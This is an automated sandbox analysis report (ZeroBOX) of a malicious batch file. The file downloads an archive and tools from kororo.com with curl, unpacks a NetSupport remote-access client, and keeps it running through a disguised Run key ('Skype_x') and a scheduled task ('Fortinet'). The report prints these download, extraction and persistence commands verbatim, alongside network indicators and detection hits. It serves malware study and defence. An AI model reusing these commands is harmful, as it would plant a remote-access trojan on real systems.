Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 30, 2023, 1:30 p.m.	June 30, 2023, 1:32 p.m.

Size	1.5KB
Type	DOS batch file, ASCII text
MD5	`a6d60304c3c87b7ca21aa38c1ed9fb83`
SHA256	`f1d371d8ac7348f9f37f35b2f13b98302ff9e0c881e1a364ed337a8a9df8d329`
CRC32	`F38111F0`
ssdeep	`24:QeLfEwAmDmLOcu8NSGiL8N9La68Nii1t121m:LLvYBjnXCN`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "QMWLkJuNqu" C:\Users\test22\AppData\Local\Temp\1.bat
2568
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\1.bat
  2640
  - cmd.exe cmd.exe /c C:\ProgramData\sett.bat"
    2728
    - curl.exe curl -k "https://kororo.com/tu5466s/tempy.7z" -o "C:\ProgramData\tempy.7z"
      2796
  - cmd.exe cmd.exe /c C:\ProgramData\7z.bat"
    2888
    - curl.exe curl -k "https://kororo.com/tu5466s/7zz.exe" -o "C:\ProgramData\7zz.exe"
      2932
  - cmd.exe cmd.exe /c C:\ProgramData\2.bat"
    2988
    - curl.exe curl -k "https://kororo.com/tu5466s/2.bat" -o "C:\ProgramData\2.bat"
      3056
    - xcopy.exe xcopy /h /y tempy.7z C:\ProgramData\
      908
    - reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
      2124
    - reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Skype_x" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
      2064
  - cmd.exe cmd.exe /c C:\ProgramData\2.bat"
    2200
    - xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
      2268
    - xcopy.exe xcopy /h /y tempy.7z C:\ProgramData\
      2476
    - cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
      2588
      - 7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\
        2828
    - timeout.exe TIMEOUT /T 3
      2684
    - schtasks.exe SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00
      2840
    - cmd.exe cmd /c C:\ProgramData\client32.exe
      2920
      - client32.exe C:\ProgramData\client32.exe
        1120
    - reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
      3020
    - reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Skype_x" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
      2120

Name	Response	Post-Analysis Lookup
geo.netsupportsoftware.com	A 62.172.138.8 CNAME geography.netsupportsoftware.com A 62.172.138.67	62.172.138.67
kororo.com	A 188.127.225.231	188.127.225.231

IP Address	Status	Action
164.124.101.2	Active	Moloch
188.127.225.231	Active	Moloch
62.172.138.67	Active	Moloch
94.158.244.118	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49210 -> 62.172.138.67:80	2034559	ET POLICY NetSupport GeoLocation Lookup Request	Potential Corporate Privacy Violation
TCP 192.168.56.101:49209 -> 94.158.244.118:1203	2035892	ET INFO NetSupport Remote Admin Checkin	Misc activity
TCP 94.158.244.118:1203 -> 192.168.56.101:49209	2035895	ET INFO NetSupport Remote Admin Response	Misc activity
TCP 192.168.56.101:49209 -> 94.158.244.118:1203	2035892	ET INFO NetSupport Remote Admin Checkin	Misc activity
TCP 94.158.244.118:1203 -> 192.168.56.101:49209	2035895	ET INFO NetSupport Remote Admin Response	Misc activity
TCP 192.168.56.101:49209 -> 94.158.244.118:1203	2035892	ET INFO NetSupport Remote Admin Checkin	Misc activity
TCP 192.168.56.101:49209 -> 94.158.244.118:1203	2035892	ET INFO NetSupport Remote Admin Checkin	Misc activity
TCP 192.168.56.101:49209 -> 94.158.244.118:1203	2035892	ET INFO NetSupport Remote Admin Checkin	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49168 188.127.225.231:443	None	None	None
TLS 1.3 192.168.56.101:49177 188.127.225.231:443	None	None	None
TLS 1.3 192.168.56.101:49184 188.127.225.231:443	None	None	None

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameA June 30, 2023, 1:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 30, 2023, 1:30 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 30, 2023, 1:30 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 30, 2023, 1:30 p.m.			0	0

Command line console output was observed (50 out of 103 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: 'C:\ProgramData\' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: 'Wscript.Shell' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: 'WScrit.Arguments' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: not console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: exist "C:\Users\test22\AppData\Local\Temp/document.jpg" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: curl console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: -k "https://kororo.com/tu5466s/tempy.7z" -o "C:\ProgramData\tempy.7z" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: "C:\Users\test22\AppData\Local\Temp/tempy.7z" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: '"C:\Users\test22\AppData\Local\Temp/tempy.7z"' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: not console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: exist "C:\Users\test22\AppData\Local\Temp/7z.exe" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: curl console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: -k "https://kororo.com/tu5466s/7zz.exe" -o "C:\ProgramData\7zz.exe" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: "C:\Users\test22\AppData\Local\Temp/7zz.exe" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: '"C:\Users\test22\AppData\Local\Temp/7zz.exe"' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: not console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: exist "C:\Users\test22\AppData\Local\Temp/2.bat" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: curl console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: -k "https://kororo.com/tu5466s/2.bat" -o "C:\ProgramData\2.bat" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: xcopy console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: /h /y tempy.7z C:\ProgramData\ console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: /b /min cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\tempy.7z -oC:\ProgramData\ console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: TIMEOUT console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: /T 3 console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: /b /min SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00 console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: /b /min cmd /c C:\ProgramData\client32.exe console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: set console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: Fortis=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000b	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: if console_handle: 0x0000000b	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: 0 EQU 0 console_handle: 0x0000000b	1	1
WriteConsoleW June 30, 2023, 1:30 p.m.	buffer: reg console_handle: 0x0000000b	1	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (14 events)

Time & API	Arguments	Status	Return
bind June 30, 2023, 1:23 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen June 30, 2023, 1:23 p.m.	socket: 144 backlog: 1	1	0
accept June 30, 2023, 1:23 p.m.	ip_address: socket: 144 port: 0	1	152
bind June 30, 2023, 1:23 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen June 30, 2023, 1:23 p.m.	socket: 144 backlog: 1	1	0
accept June 30, 2023, 1:23 p.m.	ip_address: socket: 144 port: 0	1	152
bind June 30, 2023, 1:23 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen June 30, 2023, 1:23 p.m.	socket: 144 backlog: 1	1	0
accept June 30, 2023, 1:23 p.m.	ip_address: socket: 144 port: 0	1	152
bind June 30, 2023, 1:30 p.m.	ip_address: 0.0.0.0 socket: 392 port: 5405	1	0
listen June 30, 2023, 1:30 p.m.	socket: 392 backlog: 1	1	0
bind June 30, 2023, 1:30 p.m.	ip_address: 0.0.0.0 socket: 396 port: 5405	1	0
bind June 30, 2023, 1:30 p.m.	ip_address: 0.0.0.0 socket: 492 port: 0	1	0
bind June 30, 2023, 1:30 p.m.	ip_address: 0.0.0.0 socket: 720 port: 0	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://geo.netsupportsoftware.com/location/loca.asp

Performs some HTTP requests (1 event)

request

GET http://geo.netsupportsoftware.com/location/loca.asp

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 30, 2023, 1:30 p.m.	process_identifier: 1120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c82000 process_handle: 0xffffffff	1	0	0

A process attempted to delay the analysis task. (1 event)

description

client32.exe tried to sleep 166 seconds, actually delayed analysis time by 166 seconds

Creates executable files on the filesystem (17 events)

file	C:\ProgramData\remcmdstub.exe
file	C:\ProgramData\pcicapi.dll
file	C:\ProgramData\client32.exe
file	C:\ProgramData\msvcr100.dll
file	C:\ProgramData\putty.exe
file	C:\Users\test22\AppData\Local\Temp\b3.vbs
file	C:\ProgramData\7zz.exe
file	C:\ProgramData\HTCTL32.DLL
file	C:\ProgramData\PCICHEK.DLL
file	C:\ProgramData\PCICL32.DLL
file	C:\ProgramData\ARCHIVE.bat
file	C:\ProgramData\sett.bat
file	C:\ProgramData\7z.bat
file	C:\ProgramData\TCCTL32.DLL
file	C:\Users\test22\AppData\Local\Temp\b2.vbs
file	C:\ProgramData\2.bat
file	C:\Users\test22\AppData\Local\Temp\b1.vbs

Creates a suspicious process (4 events)

cmdline	cmd.exe /c C:\ProgramData\sett.bat"
cmdline	SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00
cmdline	cmd.exe /c C:\ProgramData\7z.bat"
cmdline	cmd.exe /c C:\ProgramData\2.bat"

Executes one or more WMI queries (2 events)

wmi	SELECT * FROM Win32_SystemEnclosure
wmi	SELECT * FROM Win32_ComputerSystem

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 30, 2023, 1:30 p.m.	flags: 0 family: 2		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 30, 2023, 1:30 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1	0

Yara rule detected in process memory (50 out of 187 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	File Downloader	rule	Network_Downloader
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Escalate priviledges	rule	Escalate_priviledges
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	File Downloader	rule	Network_Downloader
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Escalate priviledges	rule	Escalate_priviledges
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Queries for potentially installed applications (4 events)

Time & API	Arguments	Return
RegOpenKeyExA June 30, 2023, 1:30 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3F709462-4AD7-482F-8761-C6ED6AD145A1} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3F709462-4AD7-482F-8761-C6ED6AD145A1}	2
RegOpenKeyExA June 30, 2023, 1:30 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C412F191-BB15-4e40-9CCC-97E571D2C6BF} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C412F191-BB15-4e40-9CCC-97E571D2C6BF}	2
RegOpenKeyExA June 30, 2023, 1:30 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{787DFE02-CC6C-4AAC-B455-166BBEE4C5AF} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{787DFE02-CC6C-4AAC-B455-166BBEE4C5AF}	2
RegOpenKeyExA June 30, 2023, 1:30 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{787DFE02-CC6C-4AAC-B455-166BBEE4C5AF} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{787DFE02-CC6C-4AAC-B455-166BBEE4C5AF}	2

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
cmdline	reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Skype_x" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
cmdline	SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_ComputerSystem

Communicates with host for which no DNS query was performed (1 event)

host

94.158.244.118

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Skype_x	reg_value	C:\ProgramData\client32.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Skype_x	reg_value	C:\ProgramData\client32.exe
cmdline	SCHTASKS /create /F /tn "Fortinet" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 5 /sd 01/01/2022 /st 00:00

Drops a binary and executes it (2 events)

file	C:\ProgramData\7zz.exe
file	C:\ProgramData\client32.exe

Putty Files, Registry Keys and/or Mutexes Detected

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2200 resumed a thread in remote process 2268
Process injection	Process 2200 resumed a thread in remote process 2476
Process injection	Process 2200 resumed a thread in remote process 2588
Process injection	Process 2200 resumed a thread in remote process 2840
Process injection	Process 2200 resumed a thread in remote process 2920
NtResumeThread June 30, 2023, 1:30 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2268	1	0	0
NtResumeThread June 30, 2023, 1:30 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2476	1	0	0
NtResumeThread June 30, 2023, 1:30 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2588	1	0	0
NtResumeThread June 30, 2023, 1:30 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2840	1	0	0
NtResumeThread June 30, 2023, 1:30 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2920	1	0	0

1.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All